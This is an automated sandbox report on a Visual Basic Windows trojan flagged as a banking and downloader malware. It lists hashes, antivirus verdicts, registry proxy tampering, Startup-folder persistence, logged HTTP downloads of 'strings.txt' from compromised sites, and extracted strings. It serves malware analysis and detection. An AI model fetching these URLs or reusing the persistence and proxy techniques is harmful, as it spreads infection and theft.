Analysis Date: 2015-01-23 21:41:11
MD5: 0c28a2463d78f17d44731c15db592ddf
SHA1: bc2dcd86c03b9729d128e3c9de0544a4005626af

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Language: 040904B0
Section: .text md5: 90bb76c0d8a6939dd095bfee91abef6f sha1: 35deddaddfa1c82786aef4b9be058a2ba47065c8 size: 327680
Section: .data md5: 620f0b67a91f7f74151bc5be745b7110 sha1: 1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d size: 4096
Section: .rsrc md5: 4db6113514893db9f181e45903c3757f sha1: 668884cc8b42fd011dcd6d17b32f212613e045b9 size: 28672
Timestamp: 2014-07-02 01:33:18
Version:
  InternalName: qsxnxy
  FileVersion: 1.00
  CompanyName: sony
  ProductName: rwpxvu
  ProductVersion: 1.00
  OriginalFilename: svyzrx.exe
Packer: Microsoft Visual Basic v5.0
PEhash: 21e3b05e19ee63a730c7dc76df9b8ab320983708
IMPhash: 124b33e006c9ae89cb73e633a7c49d04
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Variant.Graftor.142666
AV Alwil (avast): VB-AIVR [Trj]
AV Arcabit (arcavir): Gen:Variant.Graftor.142666
AV Authentium: W32/A-6dc01e27!Eldorado
AV Avira (antivir): BDS/Simda.aomenoa
AV BullGuard: Gen:Variant.Graftor.142666
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Trojan.Cossta.r3
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader11.20021
AV Emsisoft: Gen:Variant.Graftor.142666
AV Eset (nod32): Win32/Spy.Bancos.ACM
AV Fortinet: W32/Bancos.ACMB!tr
AV Frisk (f-prot): no_virus
AV F-Secure: Gen:Variant.Graftor.142666
AV Grisoft (avg): PSW.Banker6.BNBO
AV Ikarus: Trojan.Win32.Cossta
AV K7: Unwanted-Program ( 004a8e8a1 )
AV Kaspersky: Trojan.Win32.Cossta.acwf
AV MalwareBytes: no_virus
AV Mcafee: PWS-FBXN!0C28A2463D78
AV Microsoft Security Essentials: TrojanDownloader:Win32/Tasekjom.A
AV MicroWorld (escan): Gen:Variant.Graftor.142666
AV Rising: Trojan.VBInject!48DD
AV Sophos: no_virus
AV Symantec: no_virus
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): TScope.Trojan.VB

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\bc2dcd86c03b9729d128e3c9de0544a4005626af
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\~DFB9AA.tmp
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\strings.txt
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Deletes File: C:\strings.txt
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: www.pcbonto.hu
Winsock DNS: cpl.yonsei.ac.kr
Winsock DNS: www.vubp.cz
Winsock DNS: www.aviafilm.com.ua
Winsock DNS: getmoresitetraffic.com
Winsock DNS: www.vulcanusalumni.net
Winsock DNS: www.artemon.cz
Winsock DNS: tamilcinemax.net
Winsock DNS: dasan.sejong.ac.kr
Winsock DNS: www.unser-mittelhessen.de

Network Details:

DNS: pcbonto.hu
Type: A
195.70.36.61
DNS: tamilcinemax.net
Type: A
185.53.179.6
DNS: www.aviafilm.com.ua
Type: A
91.203.4.62
DNS: vubp.cz
Type: A
193.165.164.5
DNS: artew.artemon.cz
Type: A
81.19.9.10
DNS: vulcanusalumni.net
Type: A
213.186.33.16
DNS: dasan.sejong.ac.kr
Type: A
210.107.239.150
DNS: www.unser-mittelhessen.de
Type: A
85.214.252.31
DNS: getmoresitetraffic.com
Type: A
204.197.246.18
DNS: cpl.yonsei.ac.kr
Type: A
165.132.228.113
DNS: www.pcbonto.hu
Type: A
DNS: www.vubp.cz
Type: A
DNS: www.artemon.cz
Type: A
DNS: www.vulcanusalumni.net
Type: A
HTTP GET: http://www.pcbonto.hu/portal/actions/admin/perm/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://tamilcinemax.net/js/info/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://www.aviafilm.com.ua/forum/files/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://www.vubp.cz/includes/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://www.artemon.cz/dov/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://www.vulcanusalumni.net/templates/css/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://www.pcbonto.hu/portal/actions/admin/perm/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://dasan.sejong.ac.kr/~appmath/test/bbs/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://www.unser-mittelhessen.de/eventbilder/gross/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://getmoresitetraffic.com/cache/forums/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://cpl.yonsei.ac.kr/bbs/icon/private_icon/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://www.vulcanusalumni.net/templates/css/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://tamilcinemax.net/js/info/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://www.aviafilm.com.ua/forum/files/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://www.vubp.cz/includes/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://www.artemon.cz/dov/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://www.vulcanusalumni.net/templates/css/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://www.pcbonto.hu/portal/actions/admin/perm/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://dasan.sejong.ac.kr/~appmath/test/bbs/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://www.unser-mittelhessen.de/eventbilder/gross/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://getmoresitetraffic.com/cache/forums/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GET: http://cpl.yonsei.ac.kr/bbs/icon/private_icon/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Flows TCP: 192.168.1.1:1031 ➝ 195.70.36.61:80
Flows TCP: 192.168.1.1:1032 ➝ 185.53.179.6:80
Flows TCP: 192.168.1.1:1033 ➝ 91.203.4.62:80
Flows TCP: 192.168.1.1:1034 ➝ 193.165.164.5:80
Flows TCP: 192.168.1.1:1035 ➝ 81.19.9.10:80
Flows TCP: 192.168.1.1:1036 ➝ 213.186.33.16:80
Flows TCP: 192.168.1.1:1037 ➝ 195.70.36.61:80
Flows TCP: 192.168.1.1:1038 ➝ 210.107.239.150:80
Flows TCP: 192.168.1.1:1039 ➝ 85.214.252.31:80
Flows TCP: 192.168.1.1:1040 ➝ 204.197.246.18:80
Flows TCP: 192.168.1.1:1041 ➝ 165.132.228.113:80
Flows TCP: 192.168.1.1:1042 ➝ 213.186.33.16:80
Flows TCP: 192.168.1.1:1043 ➝ 185.53.179.6:80
Flows TCP: 192.168.1.1:1044 ➝ 91.203.4.62:80
Flows TCP: 192.168.1.1:1045 ➝ 193.165.164.5:80
Flows TCP: 192.168.1.1:1046 ➝ 81.19.9.10:80
Flows TCP: 192.168.1.1:1047 ➝ 213.186.33.16:80
Flows TCP: 192.168.1.1:1048 ➝ 195.70.36.61:80
Flows TCP: 192.168.1.1:1049 ➝ 210.107.239.150:80
Flows TCP: 192.168.1.1:1050 ➝ 85.214.252.31:80
Flows TCP: 192.168.1.1:1051 ➝ 204.197.246.18:80
Flows TCP: 192.168.1.1:1052 ➝ 165.132.228.113:80

Raw Pcap

Strings
lllkkkjj/bbQQTV
Lpfrk7
l$$PUV
L$ PUV
LRI?9\
lw4u26
lz32.dll
LZClose
LZCopy
LZOpenFileA
m\.1,,,,,2TW
Mimbo5h
mmdBEO]_
MMM3MMM
MMM7MMM
MMM9MMMxMMM
MMMAMMMNMMMKMMMFMMM@MMM7MMM,MMM!MMM
MMMBMMM
MMMdMMM"MMM
MMMdMMM(MMM
MMMFMMM
MMMJMMM
MMMjMMM>MMM*MMM
MMMjMMMXMMMLMMMAMMM4MMM%MMM
MMMkMMMXMMMLMMMBMMM2MMM
MMMlMMM'MMM
MMM^MMM
MMM=MMM
MMM:MMM
MMM?MMM
MMM	MMM
MMM|MMM4MMM
MMMmMMM'MMM
MMMnMMM(MMM
MMMQMMM
MMMrMMMaMMMQMMMDMMM9MMM,MMM
MMMrMMMKMMM
MMMrMMM`MMMRMMMFMMM:MMM.MMM"MMM
MMMSMMM
MMMsMMM+MMM	MMM
MMMtMMM+MMM	MMM
MMMWMMM
MMMYMMM
MMMyMMMfMMMVMMMKMMM@MMM2MMM%MMM
MMMyMMM/MMM
MMMzMMMKMMM
MSVBVM60.DLL
NKf3mr
nLLLLZk7/5--Pb
nuk{safe4.
n~~~~~~~~v
n~~~~~~~~~~~~v
n~~~~~~~~~~~~w`
n~~~~~~~~~~~~w`w
nwwwwwwww`ww
n~~~~~~~~~~~~w`x
nzqrxp
oaaaa_ep
Obpfw7
OFFEEEDDDD.111111RU
Output
Ozk8wz
ozsqqs
p7ki27d
p]f;\$
pn~~~~
Pni5rni
~~~p~p
Pu7gwl
Q6hktx
/QGGGRT
qj8311g
QT_^]3
Qwcttn5
r8nqnq0
Reads data of binary type...
Reads data of dword type...
Reads data of string type...
RegCloseKey
RegCreateKeyA
RegDeleteKeyA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
Resiax6
Ro```]]
RtlMoveMemory
Ru9kwpx
rX+%"/
rZ8oWFFWwwvvC:QQQRa'
SerialNumber
SetTimer
shell32.dll
SHGetPathFromIDListA
SHGetSpecialFolderLocation
ShowWindow
si4s82
STKIT432.DLL
Sty8ki
Sxgnys8
sYR|nyywwx
Ta8fwwqj
!This program cannot be run in DOS mode.
tnnTTi
Toei4ii
toobRTi
~TQWhd
^}}|tt
|tyg,1
Ucef7bn
user32
user32.dll
uspoxz
UTlZMSK
uuu4nncTK
Uyt5jo
Uyt5jo_Timer
Uywl1s
~~~~~~~~~~~~v
v46txa2
VB5!6&*
VBA6.DLL
__vbaAryConstruct2
__vbaAryCopy
__vbaAryDestruct
__vbaAryLock
__vbaAryMove
__vbaAryUnlock
__vbaAryVar
__vbaBoolVarNull
__vbaChkstk
__vbaEnd
__vbaErase
__vbaErrorOverflow
__vbaExceptHandler
__vbaExitProc
__vbaFileClose
__vbaFileOpen
__vbaFixstrConstruct
__vbaFPException
__vbaFpI2
__vbaFpI4
__vbaFPInt
__vbaFpR8
__vbaFreeObj
__vbaFreeObjList
__vbaFreeStr
__vbaFreeStrList
__vbaFreeVar
__vbaFreeVarList
__vbaGenerateBoundsError
__vbaGet3
__vbaGetOwner3
__vbaHresultCheckObj
__vbaI2I4
__vbaI2Var
__vbaI4Var
__vbaInStr
__vbaInStrVar
__vbaLateMemCall
__vbaLbound
__vbaLenBstr
__vbaLenBstrB
__vbaLsetFixstr
__vbaNew
__vbaNew2
__vbaObjSet
__vbaObjSetAddref
__vbaObjVar
__vbaOnError
__vbaPrintFile
__vbaPut3
__vbaPutOwner3
__vbaR8IntI2
__vbaR8IntI4
__vbaR8Str
__vbaRaiseEvent
__vbaRecAnsiToUni
__vbaRecUniToAnsi
__vbaRedim
__vbaRedimPreserve
__vbaSetSystemError
__vbaStr2Vec
__vbaStrCat
__vbaStrCmp
__vbaStrCopy
__vbaStrErrVarCopy
__vbaStrI2
__vbaStrI4
__vbaStrMove
__vbaStrToAnsi
__vbaStrToUnicode
__vbaStrVarCopy
__vbaStrVarMove
__vbaStrVarVal
__vbaUbound
__vbaUI1I2
__vbaUI1I4
__vbaVar2Vec
__vbaVarAdd
__vbaVarAnd
__vbaVarCat
__vbaVarCmpEq
__vbaVarCmpNe
__vbaVarCopy
__vbaVarDup
__vbaVarForInit
__vbaVarForNext
__vbaVarInt
__vbaVarMove
__vbaVarMul
__vbaVarOr
__vbaVarSub
__vbaVarTstEq
__vbaVarTstGt
__vbaVarTstNe
Vevhy2fh
~vfffffff~~~v
V`mdRQJ"& 
Vs3calw
vtvswy
~~~~~~~w`
W1aivv
w4j422j
WaitForSingleObject
WFFFFW,)---<^
wininet.dll
winspool.drv
Wkbk6df
Wooi8i
wqbsg8s
w,)-**>R
Writes data of binary type...
Writes data of dword type...
Writes data of string type...
wuy52x4
~~~~~~~w`w
^@WWWW
wwwwwwwww
wwwwwwwwww
Wzlorh5n
XL\[FGE
xlllkkkjj
XRG???
Xrk3xj
Y3+)"""#
Y4mmze
YRIPPPF
Yuhold7
~~||{yy4naTV
||{yywuuuuu4oooTV
{yywwu
Zm4zfc
z>]N?@5
Zombie_GetTypeInfo
Zombie_GetTypeInfoCount
zpnyrt
z_____/VK<-
ZZZNN/HHHHJTW
][[[ZZZNNOO/HH::;UU